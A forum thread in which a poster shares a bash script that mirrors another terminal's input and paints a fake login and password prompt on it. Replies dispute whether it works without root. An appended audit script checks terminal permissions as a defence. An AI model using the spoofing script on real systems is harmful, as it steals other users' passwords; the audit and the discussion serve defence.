Thread: tty hacking (no.. seriously)

  1. #1

    tty hacking (no.. seriously)

    You might remember my last thread about tty hacking (http://www.antionline.com/showthread...hreadid=119753). It turned out that didn't work, -lol-. I got really frustrated because many dismissed it as impossible:
        There is no way to read back what the other person is typing unless you are the root user and have installed software specifically for that purpose.
    Aghh! So I hacked around some more because I knew that it worked, and I just came up with a foolproof (no pun intended) method. Here's the script (attacker at tty1, victim at tty2):

    #!/bin/bash
    # attacker sits at tty1, victim at tty2
    ATTACKER=/dev/tty1
    VICTIM=/dev/tty2

    # this cat is the big moma: copy whatever the victim types on tty2 over to tty1
    cat "$VICTIM" >"$ATTACKER" &
    CATPID="$!"
    # misc commands that don't return anything
    echo -ne >"$VICTIM"
    true >"$VICTIM"
    false >"$VICTIM"
    locate dfdsfds >"$VICTIM"
    locate otherHw >"$VICTIM"
    # here's the meat: paint a fake login banner on the victim's terminal
    clear >"$VICTIM"
    echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >"$VICTIM"
    echo -ne 'Kernel 2.4.2-2 on an i686\n' >"$VICTIM"
    echo -ne '\nlocalhost login: ' >"$VICTIM"
    sleep 5
    # redraw the screen; bash on tty2 doesn't have a clue what is going on, so it
    # treats the username the victim just typed as a command. Note that $USER on
    # the next "login:" line expands to the attacker's own login name, not to
    # whatever the victim typed.
    clear >"$VICTIM"
    echo -ne '\n\nRed Hat Linux release 7.1 (Seawolf)\n' >"$VICTIM"
    echo -ne 'Kernel 2.4.2-2 on an i686\n\n' >"$VICTIM"
    echo -ne "localhost login: $USER\n" >"$VICTIM"
    echo -ne 'Password: ' >"$VICTIM"
    # the stuff entered after "Password:" is the only thing that's redirected
    sleep 5                  # give him time to enter his password
    kill -TERM "$CATPID"     # so nothing else gets redirected

    Now, 'foolproof' meaning you will get text back after the user enters his username (for some reason, after the cat and misc commands are executed, the user at tty2 must enter a string followed by Enter before text gets redirected to tty1; and that's just in time for the password to be redirected!). Now this script is extremely crappy, so don't feel stupid asking if you don't know why it's doing what it does. If I learn real scripting I'll make a better one and put it on here. Cheers
    -Ryan

  2. #2
    Senior Member (joined Nov 2001, 1,255 posts)
    Great idea; however, you need root access for this to work, and at that point you could just change the password....

    [chsh@comp chsh]$ cat /dev/tty2
    cat: /dev/tty2: Permission denied
    [chsh@comp chsh]$ su root
    Password:
    [root@comp chsh]# cat /dev/tty2
    <I CTRL+C'ed to cancel out after seeing no output>
    [root@comp chsh]#
    Chris Shepherd
    The Nelson-Shepherd cutoff: The point at which you realise someone is an idiot while trying to help them.
    \"Well as far as the spelling, I speak fluently both your native languages. Do you even can try spell mine ?\" -- Failed Insult
    Is your whole family retarded, or did they just catch it from you?

  3. #3
    Actually, you need to be the same user as the guy on tty2, or be in the group tty (I believe). But you're sort of right that the hack is useless.

  4. #4
    Senior Member (joined Nov 2001, 1,255 posts)
    Originally posted by ryannh@prodigy.
        Actually, you need to be the same user as the guy on tty2, or be in the group tty (I believe). But you're sort of right that the hack is useless.
    Right, but the idea here is to get rid of the login prompt and replace it with a fake. Only root can monitor the output of non-logged-in ttys...

    At any rate, it IS useless.
    Chris Shepherd
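An added example, not code from the thread or from any of its posters: a POSIX shell audit of which terminal device nodes the user running it can read from (the `cat /dev/tty2` sniff) or write to (the painted `login:` banner), which is the precondition the replies disagree about. Read access is what the "Permission denied" transcript above was testing; write access alone is enough to spoof a prompt. The group-write check reports the bit that `mesg y` leaves set on a tty owned by the logged-in user with group `tty`, i.e. the "same user or group tty" case from post #3. The device paths in the usage line are assumptions; adjust them to the machine at hand.

```shell
#!/bin/sh
# Added example, not code from the thread: report which terminal device nodes
# the current user can read (sniff typed input) or write (paint a fake prompt).
# The device paths in the usage line at the bottom are assumptions.

# tty_mode PATH: print "<mode-string> <owner> <group>" parsed from `ls -ld`,
# or "missing" (and return 1) if the node does not exist.
tty_mode() {
    if [ ! -e "$1" ]; then
        echo missing
        return 1
    fi
    # word-splitting the ls output is intended here: $1=mode $3=owner $4=group
    set -- $(ls -ld "$1")
    echo "$1 $3 $4"
}

# tty_exposure PATH: classify what the calling user could do to that terminal.
#   missing     node does not exist
#   exposed-rw  can read (sniff keystrokes) and write (spoof a login prompt)
#   exposed-w   can write only: still enough for the fake "login:" banner
#   exposed-r   can read only
#   closed      neither, which is what the "Permission denied" reply saw
tty_exposure() {
    if [ ! -e "$1" ]; then
        echo missing
        return 0
    fi
    r=0; w=0
    [ -r "$1" ] && r=1
    [ -w "$1" ] && w=1
    case "$r$w" in
        11) echo exposed-rw ;;
        01) echo exposed-w ;;
        10) echo exposed-r ;;
        *)  echo closed ;;
    esac
}

# group_writable PATH: succeed if the group write bit is set. On a tty owned by
# the logged-in user with group "tty", that is the bit `mesg y` turns on and
# the one that lets other members of group tty write to the terminal.
group_writable() {
    mode=$(tty_mode "$1") || return 1
    case "$mode" in
        ?????w*) return 0 ;;
        *)       return 1 ;;
    esac
}

# tty_audit PATH...: one line per device: path, exposure class, mode owner group.
tty_audit() {
    for dev in "$@"; do
        printf '%-12s %-11s %s\n' "$dev" "$(tty_exposure "$dev")" "$(tty_mode "$dev")"
    done
}

# Usage: set TTY_AUDIT=1 to run the audit; the device list is an assumption.
if [ "${TTY_AUDIT:-0}" = 1 ]; then
    tty_audit /dev/tty1 /dev/tty2 /dev/pts/0 /dev/tty
fi
```

Run it as the unprivileged user you are worried about, not as root, since root passes every `-r`/`-w` test regardless of mode bits. Anything reported `exposed-w` for a console you are not sitting at is exactly what the script in post #1 needs; `mesg n` clears the group-write bit on your own terminal, and Linux's secure attention key (Alt+SysRq+K) kills every process on the current virtual console, which is the intended defence against a painted login prompt.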
